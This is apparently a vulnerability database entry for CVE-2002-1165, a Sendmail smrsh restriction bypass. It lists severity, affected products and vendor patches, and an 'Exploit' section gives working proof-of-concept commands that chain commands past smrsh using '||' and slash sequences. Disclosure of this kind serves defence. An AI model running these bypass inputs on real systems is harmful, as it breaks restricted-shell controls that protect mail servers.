CVE-2002-1165
CVSS 4.6
Published: 2002-10-11 00:00:00
Last revised: 2016-10-17 22:24:17

[Original] Sendmail Consortium's Restricted Shell (SMRSH) in Sendmail 8.12.6, 8.11.6-15, and possibly other versions after 8.11 from 5/19/1998, allows attackers to bypass the intended restrictions of smrsh by inserting additional commands after (1) "||" sequences or (2) "/" characters, which are not properly filtered or verified.


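[CNNVD] Sendmail SMRSH Double Pipe Access Validation Vulnerability (CNNVD-200210-266)

        A vulnerability exists in Sendmail Consortium's Restricted Shell (SMRSH) in Sendmail 8.12.6, 8.11.6-15, and possibly other versions after 8.11 from 5/19/1998. An attacker can bypass the intended restrictions of smrsh by inserting additional commands after (1) "||" sequences or (2) "/" characters, which are not properly filtered or verified.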

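- CVSS (base score)

CVSS score: 4.6 [MEDIUM]
Confidentiality impact: PARTIAL [information disclosure is likely]
Integrity impact: PARTIAL [system files may be modified]
Availability impact: PARTIAL [may degrade performance or interrupt access to resources]
Attack complexity: LOW [no access restrictions on exploitation]
Attack vector: LOCAL [exploitation requires physical access or a local account]
Authentication: NONE [exploitation requires no authentication]

- CPE (affected platforms and products)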

cpe:/a:sendmail:sendmail:8.12.0    Sendmail Sendmail 8.12.0
cpe:/o:netbsd:netbsd:1.5.3    NetBSD 1.5.3
cpe:/o:netbsd:netbsd:1.5.2    NetBSD 1.5.2
cpe:/a:sendmail:sendmail:8.12.2    Sendmail Sendmail 8.12.2
cpe:/a:sendmail:sendmail:8.12.1    Sendmail Sendmail 8.12.1
cpe:/a:sendmail:sendmail:8.12.4    Sendmail Sendmail 8.12.4
cpe:/o:netbsd:netbsd:1.6    NetBSD 1.6
cpe:/a:sendmail:sendmail:8.12.3    Sendmail Sendmail 8.12.3
cpe:/o:netbsd:netbsd:1.5    NetBSD 1.5
cpe:/a:sendmail:sendmail:8.12.6    Sendmail Sendmail 8.12.6
cpe:/a:sendmail:sendmail:8.12.5    Sendmail Sendmail 8.12.5
cpe:/o:netbsd:netbsd:1.5.1    NetBSD 1.5.1

- OVAL (technical details for detection)

No related OVAL definitions found

- Official database links

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1165
(Official data source) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2002-1165
(Official data source) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200210-266
(Official data source) CNNVD

- Other links and resources

ftp://ftp.netbsd.org/pub/NetBSD/security/advisories/NetBSD-SA2002-023.txt.asc
(UNKNOWN)  NETBSD  NetBSD-SA2002-023
http://distro.conectiva.com.br/atualizacoes/?id=a&anuncio=000532
(UNKNOWN)  CONECTIVA  CLA-2002:532
http://marc.info/?l=bugtraq&m=103350914307274&w=2
(UNKNOWN)  BUGTRAQ  20021001 iDEFENSE Security Advisory 10.01.02: Sendmail smrsh bypass vulnerabilities
http://www.iss.net/security_center/static/10232.php
(VENDOR_ADVISORY)  XF  sendmail-forward-bypass-smrsh(10232)
http://www.mandriva.com/security/advisories?name=MDKSA-2002:083
(UNKNOWN)  MANDRIVA  MDKSA-2002:083
http://www.redhat.com/support/errata/RHSA-2003-073.html
(UNKNOWN)  REDHAT  RHSA-2003:073
http://www.securityfocus.com/bid/5845
(VENDOR_ADVISORY)  BID  5845
http://www.sendmail.org/smrsh.adv.txt
(VENDOR_ADVISORY)  CONFIRM  http://www.sendmail.org/smrsh.adv.txt

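- Vulnerability information

Sendmail SMRSH Double Pipe Access Validation Vulnerability
Severity: Medium
Vulnerability type: Access validation error
Published: 2002-10-11 00:00:00
Updated: 2005-10-20 00:00:00
Threat type: Local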



- Vulnerability information

Sendmail SMRSH Double Pipe Access Validation Vulnerability
Class: Access Validation Error
Bugtraq ID: 5845
Remote: No
Local: Yes
Published: 2002-10-01 12:00:00
Updated: 2009-07-11 05:06:00
Vulnerability discovery credited to zen-parse <zen-parse@gmx.net>.

- Affected program versions

Sendmail Consortium Sendmail 8.12.6
+ Apple Mac OS X 10.2.4
+ Conectiva Linux Enterprise Edition 1.0
+ FreeBSD FreeBSD 5.0
+ FreeBSD FreeBSD 4.7
+ MandrakeSoft Corporate Server 2.1
+ Mandriva Linux Mandrake 9.0
+ OpenBSD OpenBSD 3.2
+ S.u.S.E. Linux 8.1
Sendmail Consortium Sendmail 8.12.5
+ Conectiva Linux 9.0
+ OpenBSD OpenBSD 3.2
Sendmail Consortium Sendmail 8.12.4
+ OpenBSD OpenBSD 3.2
+ Slackware Linux 8.1
+ Slackware Linux -current
Sendmail Consortium Sendmail 8.12.3
+ Debian Linux 3.0 sparc
+ Debian Linux 3.0 s/390
+ Debian Linux 3.0 ppc
+ Debian Linux 3.0 mipsel
+ Debian Linux 3.0 mips
+ Debian Linux 3.0 m68k
+ Debian Linux 3.0 ia-64
+ Debian Linux 3.0 ia-32
+ Debian Linux 3.0 hppa
+ Debian Linux 3.0 arm
+ Debian Linux 3.0 alpha
+ Debian Linux 3.0
+ FreeBSD FreeBSD 4.6
+ S.u.S.E. Linux 8.0 i386
+ S.u.S.E. Linux 8.0
Sendmail Consortium Sendmail 8.12.2
+ Apple Mac OS X 10.2.3
+ Apple Mac OS X 10.2.2
+ Apple Mac OS X 10.2.1
+ Apple Mac OS X 10.2
+ Apple Mac OS X Server 10.2.3
+ Apple Mac OS X Server 10.2.2
+ Apple Mac OS X Server 10.2.1
+ Apple Mac OS X Server 10.2
+ OpenBSD OpenBSD 3.1
Sendmail Consortium Sendmail 8.12.1
+ HP MPE/iX 7.5
+ HP MPE/iX 7.0
+ Mandriva Linux Mandrake 8.2 ppc
+ Mandriva Linux Mandrake 8.2
Sendmail Consortium Sendmail 8.12 .0
Sendmail Consortium Sendmail 8.11.6
+ Caldera OpenLinux Server 3.1.1
+ Caldera OpenLinux Server 3.1
+ Caldera OpenLinux Workstation 3.1.1
+ Caldera OpenLinux Workstation 3.1
+ Conectiva Linux 8.0
+ Conectiva Linux 7.0
+ Conectiva Linux 6.0
+ FreeBSD FreeBSD 4.5 -RELEASE
+ FreeBSD FreeBSD 4.5
+ FreeBSD FreeBSD 4.4
+ Immunix Immunix OS 7.0
+ Mandriva Linux Mandrake 8.1 ia64
+ Mandriva Linux Mandrake 8.1
+ Mandriva Linux Mandrake 8.0 ppc
+ Mandriva Linux Mandrake 8.0
+ RedHat Linux 7.3 i386
+ RedHat Linux 7.2 ia64
+ RedHat Linux 7.2 i386
+ RedHat Linux 7.1 i386
+ RedHat Linux 7.0 i386
+ RedHat Linux 6.2 i386
+ S.u.S.E. Linux 7.3 sparc
+ S.u.S.E. Linux 7.3 ppc
+ S.u.S.E. Linux 7.3 i386
+ S.u.S.E. Linux 7.3
+ Sun Cobalt RaQ 550
+ Sun Linux 5.0.3
+ Sun Linux 5.0
Sendmail Consortium Sendmail 8.11.5
Sendmail Consortium Sendmail 8.11.4
+ Conectiva Linux 7.0
- Slackware Linux 8.0
Sendmail Consortium Sendmail 8.11.3
- MandrakeSoft Corporate Server 1.0.1
- Mandriva Linux Mandrake 8.0
+ S.u.S.E. Linux 7.2 i386
+ S.u.S.E. Linux 7.2
- Slackware Linux 7.1
Sendmail Consortium Sendmail 8.11.2
+ RedHat Linux 7.1 ia64
+ RedHat Linux 7.1 i386
+ RedHat Linux 7.1 alpha
+ RedHat Linux 7.1
+ S.u.S.E. Linux 7.1 x86
+ S.u.S.E. Linux 7.1 sparc
+ S.u.S.E. Linux 7.1 ppc
+ S.u.S.E. Linux 7.1 alpha
+ S.u.S.E. Linux 7.1
Sendmail Consortium Sendmail 8.11.1
+ Caldera OpenLinux Server 3.1
+ Caldera OpenLinux Workstation 3.1
+ Conectiva Linux 6.0
Sendmail Consortium Sendmail 8.11
+ Compaq Tru64 5.1 b
+ Compaq Tru64 5.1 a
+ Compaq Tru64 5.1
+ IBM AIX 5.2
+ IBM AIX 5.1
- Mandriva Linux Mandrake 7.2
+ RedHat Linux 7.0 sparc
+ RedHat Linux 7.0 i386
+ RedHat Linux 7.0 alpha
+ RedHat Linux 7.0
- S.u.S.E. Linux 7.0 sparc
- S.u.S.E. Linux 7.0 ppc
- S.u.S.E. Linux 7.0 alpha
- S.u.S.E. Linux 7.0
+ SCO Open Server 5.0.6 a
+ SCO Open Server 5.0.6
+ SCO Open Server 5.0.5
+ SCO Open Server 5.0.4
Sendmail Consortium Sendmail 8.10.2
+ Sun Cobalt Qube3 4000WG
+ Sun Cobalt RaQ 4
+ Sun Cobalt RaQ XTR
+ Sun Cobalt RaQ XTR 3500R
+ Sun Cobalt RaQ4 3001R
Sendmail Consortium Sendmail 8.10.1
Sendmail Consortium Sendmail 8.10
Sendmail Consortium Sendmail 8.9.3
+ Compaq Tru64 5.1 PK5 (BL19)
+ Compaq Tru64 5.0 a PK3 (BL17)
+ Debian Linux 2.2 sparc
+ Debian Linux 2.2 powerpc
+ Debian Linux 2.2 IA-32
+ Debian Linux 2.2 arm
+ Debian Linux 2.2 alpha
+ Debian Linux 2.2 68k
+ Debian Linux 2.2
+ IBM AIX 4.3.3
+ SGI IRIX 6.5.19
+ SGI IRIX 6.5.18 m
+ SGI IRIX 6.5.18 f
+ SGI IRIX 6.5.17 m
+ SGI IRIX 6.5.17 f
+ SGI IRIX 6.5.16 m
+ SGI IRIX 6.5.16 f
+ SGI IRIX 6.5.15 m
+ SGI IRIX 6.5.15 f
+ SGI IRIX 6.5.14 m
+ SGI IRIX 6.5.14 f
+ SGI IRIX 6.5.13 m
+ SGI IRIX 6.5.13 f
+ SGI IRIX 6.5.12 m
+ SGI IRIX 6.5.12 f
+ SGI IRIX 6.5.11 m
+ SGI IRIX 6.5.11 f
+ SGI IRIX 6.5.10 m
+ SGI IRIX 6.5.10 f
+ SGI IRIX 6.5.9 m
+ SGI IRIX 6.5.9 f
+ SGI IRIX 6.5.8 m
+ SGI IRIX 6.5.8 f
+ SGI IRIX 6.5.7 m
+ SGI IRIX 6.5.7 f
Sendmail Consortium Sendmail 8.8.8
+ Compaq Tru64 4.0 g PK3 (BL17)
+ Compaq Tru64 4.0 f PK7 (BL18)
+ SGI IRIX 6.5.6
+ SGI IRIX 6.5.5
+ SGI IRIX 6.5.4
+ SGI IRIX 6.5.3
+ SGI IRIX 6.5.2
+ SGI IRIX 6.5.1
+ SGI IRIX 6.5
OpenBSD OpenBSD 2.9
OpenBSD OpenBSD 2.8
OpenBSD OpenBSD 2.7
OpenBSD OpenBSD 2.6
OpenBSD OpenBSD 2.5
OpenBSD OpenBSD 2.4
OpenBSD OpenBSD 2.3
OpenBSD OpenBSD 2.2
OpenBSD OpenBSD 2.1
OpenBSD OpenBSD 3.2
OpenBSD OpenBSD 3.1
OpenBSD OpenBSD 3.0
NetBSD NetBSD 1.6
NetBSD NetBSD 1.5.3
NetBSD NetBSD 1.5.2
NetBSD NetBSD 1.5.1
NetBSD NetBSD 1.5
HP HP-UX 11.22
HP HP-UX 11.11
HP HP-UX 11.0 4
HP HP-UX 11.0
FreeBSD FreeBSD 4.6
FreeBSD FreeBSD 4.5
FreeBSD FreeBSD 4.4
FreeBSD FreeBSD 4.3
Caldera OpenLinux Workstation 3.1.1
Caldera OpenLinux Workstation 3.1
Caldera OpenLinux Server 3.1.1
Caldera OpenLinux Server 3.1

- Vulnerability discussion

Sendmail is a freely available, open source mail transport agent. It is maintained and distributed by the Sendmail Consortium. Sendmail is available for the Unix and Linux operating systems.

smrsh is designed to prevent the execution of commands outside of the restricted environment. However, when commands are entered using either double pipes (||) or a mixture of dot (.) and slash (/) characters, a user may be able to bypass the checks performed by smrsh. This could lead to the execution of commands outside of the restricted environment.

- Exploit

$ echo "echo unauthorized execute" > /tmp/unauth
$ smrsh -c ". || . /tmp/unauth || ."
/bin/sh: /etc/smrsh/.: is a directory
unauthorized execute

OR one of the following types of commands:

smrsh -c "/ command"
smrsh -c "../ command"
smrsh -c "./ command"
smrsh -c "././ command"

- Solution

OpenBSD has released patches for OpenBSD 3.0, 3.1 and 3.2 systems.
NetBSD has released an advisory. Users are advised to upgrade the smrsh binary.

Users of NetBSD-current are advised to upgrade to NetBSD-current dated 2002-10-04 or later. Users of NetBSD 1.6 are advised to upgrade from NetBSD 1.6 sources dated 2002-10-04 or later. Users of NetBSD 1.5 through 1.5.3 are advised to upgrade from NetBSD 1.5.* sources dated 2002-10-04 or later. Further details are available in the referenced advisory.

Users of Gentoo Linux are advised to upgrade using the following commands:

emerge rsync
emerge sendmail
emerge clean

Conectiva has released an advisory.

FreeBSD has released an advisory. Users are advised to upgrade vulnerable systems to the 4.7-STABLE branch, or to the appropriate RELENG_4_x branch after the correction date. A patch is also available. Further details may be found in the referenced advisory.

Mandrake has released a security advisory (MDKSA-2002:083). Fixes for Mandrake Linux are now available.

SGI has released an advisory. Users are advised to upgrade to IRIX 6.5.19 when available or to install the appropriate patch. Further information is available in the referenced advisory.

Apple has addressed this issue in MacOS X 10.2.4/MacOS X Server 10.2.4. Users are advised to upgrade.

HP has released a revised version of their advisory (HPSBUX0212-234), which has been updated to include fix information. Users are advised to upgrade as soon as possible. An upgrade for HP-UX 11.00 and 11.11 has also been made available online and can be accessed using the following link:

http://www.software.hp.com/cgi-bin/swdepot_parser.cgi/cgi/displayProductInfo.pl?productNumber=SMAIL811

Fixes are available.


OpenBSD OpenBSD 3.2

OpenBSD OpenBSD 3.0

OpenBSD OpenBSD 3.1

HP HP-UX 11.0 4

HP HP-UX 11.0

HP HP-UX 11.11

HP HP-UX 11.22

Caldera OpenLinux Server 3.1

Caldera OpenLinux Workstation 3.1

Caldera OpenLinux Server 3.1.1

Caldera OpenLinux Workstation 3.1.1

FreeBSD FreeBSD 4.4

FreeBSD FreeBSD 4.5

FreeBSD FreeBSD 4.6

Sendmail Consortium Sendmail 8.11

Sendmail Consortium Sendmail 8.11.1

Sendmail Consortium Sendmail 8.11.4

Sendmail Consortium Sendmail 8.11.6

Sendmail Consortium Sendmail 8.12 .0

Sendmail Consortium Sendmail 8.12.1

Sendmail Consortium Sendmail 8.12.2

Sendmail Consortium Sendmail 8.12.3

Sendmail Consortium Sendmail 8.12.4

Sendmail Consortium Sendmail 8.12.5

Sendmail Consortium Sendmail 8.12.6
